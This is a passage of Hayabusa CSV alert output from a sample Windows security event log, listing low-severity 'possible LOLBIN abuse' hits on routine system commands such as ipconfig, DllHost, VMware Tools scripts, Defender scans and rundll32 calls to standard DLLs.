Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x37c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:08:02.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:08:08.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x238 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-08-19 11:19:46.662 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:20:06.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3c0 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:20:16.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 22:57:54.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 22:57:55.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xef8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 22:57:59.004 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement 
Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x82c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 22:58:15.410 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbbc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 22:59:20.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb24 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:01:29.243 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 01:01:36.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 
01:01:36.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 01:01:36.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 01:03:36.695 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x68c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 01:57:08.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 02:02:48.677 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: 
C:\Windows\System32\rundll32.exe | PID: 0xcbc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 02:02:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:09:55.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:09:57.781 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:10:11.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:10:17.702 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x46c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:47:30.057 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:47:31.026 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a0 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:47:31.073 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:47:46.745 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 06:12:04.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xda0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 06:12:28.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 06:12:41.946 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4b0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 06:13:05.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 08:02:20.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 08:02:20.640 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 08:02:22.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 08:02:35.890 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x494 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:03:06.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160820160305.log C:\Windows\Logs\CBS\CbsPersist_20160820160305.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xce8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:03:06.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb0 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:03:07.144 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:03:07.801 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x250 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:03:11.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x614 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:03:25.629 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc04 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:06:05.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer 
Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 03:14:25.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x848 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 03:14:25.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 03:14:25.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 03:16:25.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 04:31:04.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 05:05:57.675 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 05:05:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 05:06:13.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 